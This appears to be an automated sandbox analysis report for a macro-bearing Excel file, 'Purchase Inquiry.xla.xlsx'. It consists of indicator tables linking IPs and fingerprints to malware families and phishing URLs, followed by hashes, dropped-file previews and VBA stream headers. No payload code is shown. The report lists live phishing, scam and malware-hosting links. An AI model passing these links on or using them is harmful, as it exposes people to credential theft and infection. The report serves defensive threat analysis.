                                          13.107.246.67https://site-xtxg5.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                            expense-report.xlsxGet hashmaliciousKnowBe4Browse
                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                https://surveymars.com/q/78graAmKoGet hashmaliciousUnknownBrowse
                                                  COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
                                                    Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                      840.xlsGet hashmaliciousUnknownBrowse
                                                        Royal Mail Inland Claim Form V1.3.xlsmGet hashmaliciousUnknownBrowse
                                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                            desaremix.exeGet hashmaliciousKillMBRBrowse
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              s-part-0039.t-0009.t-msedge.nethttps://site-xtxg5.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.246.67
                                                              expense-report.xlsxGet hashmaliciousKnowBe4Browse
                                                              • 13.107.246.67
                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              https://surveymars.com/q/78graAmKoGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              f468369488.exeGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              Royal Mail Inland Claim Form V1.3.xlsmGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.246.67
                                                              b.ps1Get hashmaliciousXWormBrowse
                                                              • 13.107.246.67
                                                              s-0005.dual-s-msedge.netNFO 12032025.msgGet hashmaliciousUnknownBrowse
                                                              • 52.123.128.14
                                                              a00f6c96-d9f8-afb1-6add-aa2447c17df9.emlGet hashmaliciousUnknownBrowse
                                                              • 52.123.129.14
                                                              4be792f3-60eb-40d6-9a49-38b2d5c6224e.emlGet hashmaliciousUnknownBrowse
                                                              • 52.123.128.14
                                                              Fw_ VN MSG 4_42_16 AM DURATION_0f0b5f5e889448e7c935c0db95b1d2a6.msgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                              • 52.123.129.14
                                                              Rappel vous n'avez pas encore sign#U00e9 mon invitation.msgGet hashmaliciousUnknownBrowse
                                                              • 52.123.128.14
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 52.123.128.14
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 52.123.129.14
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 52.123.128.14
                                                              REFUND STATUS.docxGet hashmaliciousUnknownBrowse
                                                              • 52.123.128.14
                                                              Message.emlGet hashmaliciousHTMLPhisherBrowse
                                                              • 52.123.129.14
                                                              bg.microsoft.map.fastly.netB32leNmDKJ.exeGet hashmaliciousUnknownBrowse
                                                              • 199.232.214.172
                                                              internalinfrastructuremainoffice-7.0.2317-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                              • 199.232.214.172
                                                              svchost.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              • 199.232.210.172
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 199.232.214.172
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 199.232.214.172
                                                              TOUR_PACKAGE.vbeGet hashmaliciousAgentTeslaBrowse
                                                              • 199.232.210.172
                                                              Gogles-suter-x64.exeGet hashmaliciousMicroClipBrowse
                                                              • 199.232.210.172
                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 199.232.214.172
                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 199.232.214.172
                                                              zlient.exeGet hashmaliciousUnknownBrowse
                                                              • 199.232.210.172
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              MICROSOFT-CORP-MSN-AS-BLOCKUS9ua5N7dcBZ.exeGet hashmaliciousAmadey, RHADAMANTHYSBrowse
                                                              • 104.40.149.189
                                                              Speccy64.exeGet hashmaliciousUnknownBrowse
                                                              • 13.90.213.204
                                                              Speccy64.exeGet hashmaliciousUnknownBrowse
                                                              • 13.90.213.204
                                                              pid.kvai.exeGet hashmaliciousUnknownBrowse
                                                              • 204.79.197.203
                                                              https://simplified.com/designs/cd97e327-288b-43f7-99e7-024626ab4a8c/share?utm_content=cd97e327-288b-43f7-99e7-024626ab4a8c&utm_campaign=share&utm_medium=link&utm_source=projectlinksGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 150.171.27.10
                                                              Cherokee Brick_Vnote_GUHFIOE.svgGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 13.107.6.156
                                                              zgHmnk3lVj.exeGet hashmaliciousUACMeBrowse
                                                              • 204.79.197.203
                                                              40 TC02.docxGet hashmaliciousUnknownBrowse
                                                              • 52.111.231.24
                                                              https://glee.za.com/9?ai=xd&c=E,1,FswGx5hCbuIeUVR232o9qnb3ASuBT_GXK8EnT9vfZjNfbJ5_k9gx3gTjHghh9x7WXSC6B1uqdecfudRlDIywBJrwGOqHJ_jHvGG6H4rXlyuTMMpi3A,,&typo=1Get hashmaliciousUnknownBrowse
                                                              • 13.107.253.72
                                                              https://hrutiosjadwk3-secondary.z13.web.core.windows.net/win/index.html?call=1(877)-339-4706Get hashmaliciousTechSupportScamBrowse
                                                              • 20.209.180.196
                                                              CLOUDFLARENETUSQ6EK7dte4N.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 104.21.96.1
                                                              x1D44JHWDf.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 104.21.64.1
                                                              Dsyhre- approved on Wednesday March 2025.pdfGet hashmaliciousGabagoolBrowse
                                                              • 172.67.74.152
                                                              9ua5N7dcBZ.exeGet hashmaliciousAmadey, RHADAMANTHYSBrowse
                                                              • 172.64.41.3
                                                              https://tb.boldntfst.shop/Get hashmaliciousUnknownBrowse
                                                              • 172.67.154.53
                                                              Venom.6.0.3.exeGet hashmaliciousXWormBrowse
                                                              • 172.67.19.24
                                                              https://gamma.app/docs/Acme-Marinas-u6y65o1kwdzhz1k?mode=present#card-8msfzjulvjyffwkGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.18.11.200
                                                              Marge.basrai Audio Message File from +19129031535.svgGet hashmaliciousPhisherBrowse
                                                              • 188.114.97.3
                                                              https://link.edgepilot.com/s/676bbe47/6PFrx6UDP0C_sG9a-3GsyQ?u=https://www.holidaysat.ca/?id=irc2an%26p=secure_reader_by_virtru%26c=1Get hashmaliciousUnknownBrowse
                                                              • 104.18.10.207
                                                              https://ipfs.io/ipfs/bafybeifbvu36kut5mx2cahzdxelyzulfz3gn6ptz5ul63rbub7ljlt3pjyGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.21.26.223
                                                              AMAZONEXPANSIONGBNW67yMXbfP.exeGet hashmaliciousPonyBrowse
                                                              • 3.33.130.190
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 3.39.153.44
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 3.39.89.152
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 3.39.89.152
                                                              Purchase order003.exeGet hashmaliciousFormBookBrowse
                                                              • 3.33.130.190
                                                              https://we.tl/t-BnGuynUcjLGet hashmaliciousUnknownBrowse
                                                              • 52.223.40.198
                                                              https://na4.docusign.net/Signing/EmailStart.aspx?a=98613b3e-4358-4628-9b7d-41ec67471533&acct=c0dc35b2-63fe-4f1c-a73a-e32c0fbf9ad5&er=57612189-98c9-4115-b187-cb70a302a3eeGet hashmaliciousUnknownBrowse
                                                              • 3.33.186.135
                                                              RFQ- Italy.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                              • 52.223.13.41
                                                              Quotation.exeGet hashmaliciousFormBookBrowse
                                                              • 3.33.130.190
                                                              Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                              • 3.39.153.44
                                                              AS-COLOCROSSINGUSdU0tqAiUyN.exeGet hashmaliciousRemcosBrowse
                                                              • 198.23.227.212
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 172.245.191.88
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 172.245.191.88
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 172.245.191.88
                                                              onceufeelgood.htaGet hashmaliciousCobalt StrikeBrowse
                                                              • 172.245.191.88
                                                              SAINV101.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                              • 192.227.246.70
                                                              NEW__Review_202551087.svgGet hashmaliciousHTMLPhisherBrowse
                                                              • 192.227.220.2
                                                              cndx.com.emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                              • 104.168.69.110
                                                              Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                              • 23.95.235.28
                                                              Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                              • 23.95.235.28
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              6271f898ce5be7dd52b0fc260d0662b3SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              https://crypt.single-sign-on.password.land/Xd3QvSWJuTlhiVW04UGxPbkxoejhHVU80SU05YXVvd2Q1ZnhDMFVkN2RYQnRPM00wZ1ZhT0xuR3l5d2NvbW9vME00MURTS1lmdEwwSmdwcEtLaTJSZFpkbDd3dnJGVmdCcUNzMngxN2NOOTd0ZHhHZTJaQzN2K1ZtZ0NBanJFQXFYQk5MU2ZBT2VteUtFTkVubWtHYkVLNkNncmJpUnBOL3RLWXp2N25BTUltZ0RGcUViZnExV3pYY3BlN2kwOGhHd2hrYnR0MmVPME1pMlpCWG9PQ0JVd1RvMWd2Mi0tK2NtTUtPVmpHMWdhOENYQi0tNFkxM1RaaTIxS0pqSVk4MHhlWGFUZz09?cid=2442051797Get hashmaliciousKnowBe4Browse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              http://def.ball-strike-up.shop/Get hashmaliciousUnknownBrowse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              PO202503D.xlsmGet hashmaliciousDarkVision RatBrowse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              PO202503S.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                                              • 104.21.68.120
                                                              • 3.39.89.152
                                                              a0e9f5d64349fb13191bc781f81f42e1Q6EK7dte4N.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 13.107.246.67
                                                              x1D44JHWDf.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 13.107.246.67
                                                              M1gP5m86Gn.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 13.107.246.67
                                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              ca703fd579bbcee73544b9b37f8a6469.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 13.107.246.67
                                                              DEVM24-clean.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 13.107.246.67
                                                              kumori.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 13.107.246.67
                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.67
                                                              No context
                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):118
                                                              Entropy (8bit):3.5700810731231707
                                                              Encrypted:false
                                                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                              MD5:573220372DA4ED487441611079B623CD
                                                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):784
                                                              Entropy (8bit):2.7137690747287806
                                                              Encrypted:false
                                                              SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                                                              MD5:09F73B3902CD3D88E04312787956B654
                                                              SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                                                              SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                                                              SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):165
                                                              Entropy (8bit):1.3520167401771568
                                                              Encrypted:false
                                                              SSDEEP:3:xvXFz7f:9Xl
                                                              MD5:4B86B2D21B2AC48AD3A1A46FBF1DE4D5
                                                              SHA1:2D695349311A0DAF9B77392C04178F1BD99CCEF2
                                                              SHA-256:22C126EA43AB2F7C80E19E857C50118A3E08A4A98BE31E2ADCFCA88C8E6C5A5D
                                                              SHA-512:FE133E064DAF100FAD21CB4AE44AE573F66A0157A9418538FCE9744B8FB0500478EDE10B9A49E222AA21F14DCB32B384BA1B4D06402D6519EC4E645295F46B76
                                                              Malicious:true
                                                              Preview:.user ..b.r.o.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Mar 12 07:19:18 2025, Security: 1
                                                              Entropy (8bit):7.982301560919923
                                                              TrID:
                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                              File name:Purchase Inquiry.xla.xlsx
                                                              File size:1'308'160 bytes
                                                              MD5:e3afcc72b9f65030bcee289cda558807
                                                              SHA1:2de4b10d11a2741ffa6c3943433184caa9eef6d2
                                                              SHA256:d106446ba75a9d3612477acd3ef7c5c5b172709196d6e2962ecfabfb10e04132
                                                              SHA512:2d604b51336dd6a1c549f000b0be2c5bcf0e9c6a3de899ff3f399fbe99f87afae6089d13b3941a048fa3ee7a1e720c58eb8f19865ae9b4c76924e8388ef13f01
                                                              SSDEEP:24576:xJJDEM2sTVgyawU1CGO7oaomhapQs7ANo+9npaJ0/6CYO3cZmf:bJz5xaP/O7oarhMB7Yz9paJ0/7w
                                                              TLSH:24552328BBC45B0BC4DF99B84C95D6A284768ED9BE56E11B3388334C7937579838732C
                                                              File Content Preview:........................>......................................................................................................................................................................................................................................
                                                              Icon Hash:35e58a8c0c8a85b9
                                                              Document Type:OLE
                                                              Number of OLE Files:1
                                                              Has Summary Info:
                                                              Application Name:Microsoft Excel
                                                              Encrypted Document:True
                                                              Contains Word Document Stream:False
                                                              Contains Workbook/Book Stream:True
                                                              Contains PowerPoint Document Stream:False
                                                              Contains Visio Document Stream:False
                                                              Contains ObjectPool Stream:False
                                                              Flash Objects Count:0
                                                              Contains VBA Macros:True
                                                              Code Page:1252
                                                              Author:
                                                              Last Saved By:
                                                              Create Time:2006-09-16T00:00:00Z
                                                              Last Saved Time:2025-03-12T07:18:41Z
                                                              Creating Application:Microsoft Excel
                                                              Security:0
                                                              Document Code Page:1252
                                                              Thumbnail Scaling Desired:false
                                                              Contains Dirty Links:false
                                                              Shared Document:false
                                                              Changed Hyperlinks:false
                                                              Application Version:12.0000
                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                              VBA File Name:Sheet1.cls
                                                              Stream Size:977
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b6 b8 bb 31 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Attribute VB_Name = "Sheet1"
                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                              Attribute VB_GlobalNameSpace = False
                                                              Attribute VB_Creatable = False
                                                              Attribute VB_PredeclaredId = True
                                                              Attribute VB_Exposed = True
                                                              Attribute VB_TemplateDerived = False
                                                              Attribute VB_Customizable = True
                                                              

                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                              VBA File Name:Sheet2.cls
                                                              Stream Size:977
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b6 b8 d1 b6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Attribute VB_Name = "Sheet2"
                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                              Attribute VB_GlobalNameSpace = False
                                                              Attribute VB_Creatable = False
                                                              Attribute VB_PredeclaredId = True
                                                              Attribute VB_Exposed = True
                                                              Attribute VB_TemplateDerived = False
                                                              Attribute VB_Customizable = True
                                                              

                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                              VBA File Name:Sheet3.cls
                                                              Stream Size:977
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m < . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b6 b8 6d 3c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Attribute VB_Name = "Sheet3"
                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                              Attribute VB_GlobalNameSpace = False
                                                              Attribute VB_Creatable = False
                                                              Attribute VB_PredeclaredId = True
                                                              Attribute VB_Exposed = True
                                                              Attribute VB_TemplateDerived = False
                                                              Attribute VB_Customizable = True
                                                              

                                                              General
                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                              VBA File Name:ThisWorkbook.cls
                                                              Stream Size:985
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b6 b8 ca 8c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Attribute VB_Name = "ThisWorkbook"
                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                              Attribute VB_GlobalNameSpace = False
                                                              Attribute VB_Creatable = False
                                                              Attribute VB_PredeclaredId = True
                                                              Attribute VB_Exposed = True
                                                              Attribute VB_TemplateDerived = False
                                                              Attribute VB_Customizable = True
                                                              

                                                              General
                                                              Stream Path:\x1CompObj
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:114
                                                              Entropy:4.25248375192737
                                                              Base64 Encoded:True
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                              General
                                                              Stream Path:\x5DocumentSummaryInformation
                                                              CLSID:
                                                              File Type:data
                                                              Stream Size:244
                                                              Entropy:2.889430592781307
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                              General
